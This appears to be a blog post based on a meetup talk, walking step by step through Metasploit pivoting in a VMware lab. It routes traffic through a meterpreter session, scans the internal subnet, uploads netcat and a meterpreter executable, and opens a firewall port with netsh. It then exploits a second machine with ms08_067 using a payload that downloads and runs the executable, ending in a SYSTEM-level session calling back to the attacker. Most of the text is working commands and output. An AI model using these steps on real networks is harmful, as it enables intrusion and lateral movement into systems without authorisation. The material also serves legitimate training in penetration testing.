There was a presentation on "Post exploitation techniques using
msf-nc kungfu" in
null monthly meet.
So here is post about the presentation and things I may have missed.
Aim:There is a compromised machine in a network and you want to find/target other nodes inside the network.
Scenario:Attacker running BackTrack sitting outside the network. Machine
A (Pivot) and machine
B behind the NAT.
So here we go with the meterpreter session on pivot machine:
meterpreter > ipconfig
MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0
AMD PCNET Family PCI Ethernet Adapter #3 - Packet Scheduler Miniport Hardware MAC: 00:0c:29:1e:d3:76 IP Address : 192.168.74.128 Netmask : 255.255.255.0
meterpreter > route
Network routes ==============
Subnet Netmask Gateway ------ ------- ------- 0.0.0.0 0.0.0.0 192.168.74.2 127.0.0.0 255.0.0.0 127.0.0.1 192.168.74.0 255.255.255.0 192.168.74.128 192.168.74.128 255.255.255.255 127.0.0.1 192.168.74.255 255.255.255.255 192.168.74.128 224.0.0.0 240.0.0.0 192.168.74.128 255.255.255.255 255.255.255.255 192.168.74.128
meterpreter >
|
1. Pass the traffic for desired subnet through meterpreter session:So, in order to run scans and use other modules of meterpreter, we would need to add route so that when we target a particular subnet it will be routed through meterpreter session.
Let's see, how we can do that...
Back on the multi/handler...
msf exploit(handler) > route add 192.168.74.0 255.255.255.0 1 msf exploit(handler) > route print
Active Routing Table ====================
Subnet Netmask Gateway ------ ------- ------- 192.168.74.0 255.255.255.0 Session 1
msf exploit(handler) >
|
So now the network traffic meant for subnet 192.168.74.0/24 would be routed through meterpreter session 1.
2. Enumerate the nodes inside the network:We will be using meterpreter module
arp_scanner to scan the network.
msf exploit(handler) > sessions -l
Active sessions ===============
Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 WINXP\user @ WINXP 172.16.24.130:443 -> 172.16.24.1:46715
msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1...
meterpreter > run arp_scanner -h Meterpreter Script for performing an ARPS Scan Discovery.
OPTIONS:
-h Help menu. -i Enumerate Local Interfaces -r The target address range or CIDR identifier -s Save found IP Addresses to logs.
meterpreter > run arp_scanner -r 192.168.74.0/24 [*] ARP Scanning 192.168.74.0/24 [*] IP: 192.168.74.1 MAC 0:50:56:c0:0:8 [*] IP: 192.168.74.2 MAC 0:50:56:ec:f0:e5 [*] IP: 192.168.74.128 MAC 0:c:29:1e:d3:76 [*] IP: 192.168.74.129 MAC 0:c:29:7e:bd:74 [*] IP: 192.168.74.254 MAC 0:50:56:e5:a:b0 meterpreter >
|
Ok. As you can see, there are 5 IP addresses seems alive in the network.
The IP address 192.168.74.1, 192.168.74.2 and 192.168.74.254 are of VMware workstation virtual network adapters.
The distribution is like
192.168.74.2 - gateway IP address of virtual machine behind NAT
192.168.74.1 - external IP address(vmnet8)
192.168.74.254 - DHCP server for virtual machines behind NAT
So, apart from all that, there is one more virtual machine which can be of our interest.
Let's find out...
We will use tcp portscanner auxiliary module to find out the open ports...(with some well-known ports)
msf exploit(handler) > use auxiliary/scanner/portscan/tcp msf auxiliary(tcp) > show options
Module options:
Name Current Setting Required Description ---- --------------- -------- ----------- CONCURRENCY 10 yes The number of concurrent ports to check per host FILTER no The filter string for capturing traffic INTERFACE no The name of the interface PCAPFILE no The name of the PCAP capture file to process PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS yes The target address range or CIDR identifier SNAPLEN 65535 yes The number of bytes to capture THREADS 1 yes The number of concurrent threads TIMEOUT 1000 yes The socket connect timeout in milliseconds VERBOSE false no Display verbose output
msf auxiliary(tcp) > set RHOSTS 192.168.74.129 RHOSTS => 192.168.74.129 msf auxiliary(tcp) > set PORTS 21,22,23,25,80,110,135,139,443,445 PORTS => 21,22,23,25,80,110,135,139,443,445 msf auxiliary(tcp) > run
[*] 192.168.74.129:139 - TCP OPEN [*] 192.168.74.129:445 - TCP OPEN [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(tcp) >
|
Alright. So there seems to be sharing enabled on the target machine.
We will use infamous ms08_067 exploit...
But, now there are problems choosing appropriate payload.
- Bindshell payload can't be used, as we have no direct access to machine B. So even if machine B gets infected and starts listening on some port specified by the payload, we won't be able to connect to it.
- Reverse connect payloads also can't be used, assuming the situation that machine B has no direct internet access.
So, all I did was uploaded
netcat and a custom file which is combination of a HTTP-response appended with meterpreter client executable(in this case if successful, of course, it would reverse connect back to the listening multi/handler on attacker's machine and so to confirm that the exploit was successful).
Let's do that...
meterpreter > upload /tmp/netcat.exe /tmp/httpresponse-msf.cfg %temp% [*] uploading : /tmp/netcat.exe -> %temp% [*] uploaded : /tmp/netcat.exe -> %temp%\netcat.exe [*] uploading : /tmp/httpresponse-msf.cfg -> %temp% [*] uploaded : /tmp/httpresponse-msf.cfg -> %temp%\httpresponse-msf.cfg meterpreter >
|
Ok.
So now we will start a small webserver using
netcat on pivot machine with redirecting httpresponse-msf.cfg(can have any extension).
meterpreter > execute -H -f cmd.exe -c -i Process 256 created. Channel 9 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user\Desktop>cd %temp% cd %temp%
C:\DOCUME~1\user\LOCALS~1\Temp>dir dir Volume in drive C has no label. Volume Serial Number is 080D-40BD
Directory of C:\DOCUME~1\user\LOCALS~1\Temp
12/05/2010 01:57 AM <DIR> . 12/05/2010 01:57 AM <DIR> .. 10/23/2009 07:30 PM 8,704 21227.mst 10/23/2009 07:30 PM 8,704 21ad2.mst 10/23/2009 07:30 PM 8,704 48f1e.mst 10/23/2009 07:30 PM 8,704 c833.mst 08/15/2009 02:54 AM 8,704 ff21.mst 12/05/2010 01:57 AM 74,144 httpresponse-msf.cfg 12/05/2010 01:57 AM 61,440 netcat.exe 10/23/2009 07:30 PM 33,709 vminst.log_20091023_193054.log 06/10/2010 11:06 AM 41,986 vminst.log_20100610_110602.log 09/24/2010 12:47 PM 45,686 vminst.log_20100924_124718.log 09/28/2010 04:41 PM 45,537 vminst.log_20100928_164134.log 11/29/2010 03:53 PM 45,537 vminst.log_20101129_155316.log 10/23/2009 07:30 PM 2,573,050 vmmsi.log_20091023_193054.log 10/23/2009 07:30 PM 2,573,050 vmmsi.log_20091023_193054_Failed.log 06/10/2010 11:06 AM 2,958,144 vmmsi.log_20100610_110601.log 09/24/2010 12:47 PM 3,008,988 vmmsi.log_20100924_124718.log 09/28/2010 04:41 PM 2,960,554 vmmsi.log_20100928_164134.log 11/29/2010 03:53 PM 2,958,778 vmmsi.log_20101129_155316.log 11/29/2010 03:54 PM <DIR> VMwareDnD 18 File(s) 17,424,123 bytes 3 Dir(s) 40,819,601,408 bytes free
C:\DOCUME~1\user\LOCALS~1\Temp>start /b netcat.exe -nlvp 80 <>listening on [any] 80 ...
C:\DOCUME~1\user\LOCALS~1\Temp>
|
Oops. Looks like somebody is interfering with our business.
The firewall on pivot machine may interfere to open a port on listening mode.
But, we got access of this machine and here is how we can add an exception in firewall...
C:\DOCUME~1\user\LOCALS~1\Temp>netsh firewall set portopening tcp 80 nc enable all netsh firewall set portopening tcp 80 nc enable all Ok.
C:\DOCUME~1\user\LOCALS~1\Temp>
|
Ok. So now we were able to open port number 80 and enabled it for listening mode.
Alright, so let's run
netcat as we had done once again.
C:\DOCUME~1\user\LOCALS~1\Temp>start /b netcat.exe -nlvp 80 <>listening on [any] 80 ...
C:\DOCUME~1\user\LOCALS~1\Temp>exit exit ^C Terminate channel 9? [y/N] y meterpreter >
|
All set. Now set the parameters and run ms08_067 for machine B...
meterpreter > background msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name -- ---- 0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.74.129 RHOST => 192.168.74.129 msf exploit(ms08_067_netapi) > set PAYLOAD windows/download_exec PAYLOAD => windows/download_exec msf exploit(ms08_067_netapi) > set URL http://192.168.74.128/ URL => http://192.168.74.128/ msf exploit(ms08_067_netapi) > show options Module options:
Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.74.129 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/download_exec):
Name Current Setting Required Description ---- --------------- -------- ----------- URL http://192.168.74.128/ yes The pre-encoded URL to the executable
Exploit target:
Id Name -- ---- 0 Automatic Targeting
msf exploit(ms08_067_netapi) > exploit -j [*] Exploit running as background job. msf exploit(ms08_067_netapi) > [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Attempting to trigger the vulnerability... [*] 172.16.24.1:36593 Request received for /Af4IZ... [*] 172.16.24.1:36593 Staging connection for target f4IZ received... [*] Patching Target ID f4IZ into DLL [*] 172.16.24.1:45245 Request received for /Bf4IZ... [*] 172.16.24.1:45245 Stage connection for target f4IZ received... [*] Meterpreter session 2 opened (172.16.24.130:443 -> 172.16.24.1:45245) at 2010-12-04 20:57:45 +0000
msf exploit(ms08_067_netapi) >
|
Here we go...
As we can see, the exploit was successful and it opened meterpreter session 2 connecting back to the attacker's machine.
msf exploit(ms08_067_netapi) > sessions -l
Active sessions ===============
Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 WINXP\user @ WINXP 172.16.24.130:443 -> 172.16.24.1:46715 2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WINXP 172.16.24.130:443 -> 172.16.24.1:45245
msf exploit(ms08_067_netapi) > sessions -i 2 [*] Starting interaction with 2...
meterpreter > ipconfig
MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0
AMD PCNET Family PCI Ethernet Adapter #3 - Packet Scheduler Miniport Hardware MAC: 00:0c:29:7e:bd:74 IP Address : 192.168.74.129 Netmask : 255.255.255.0
meterpreter >
|
..............Done!!!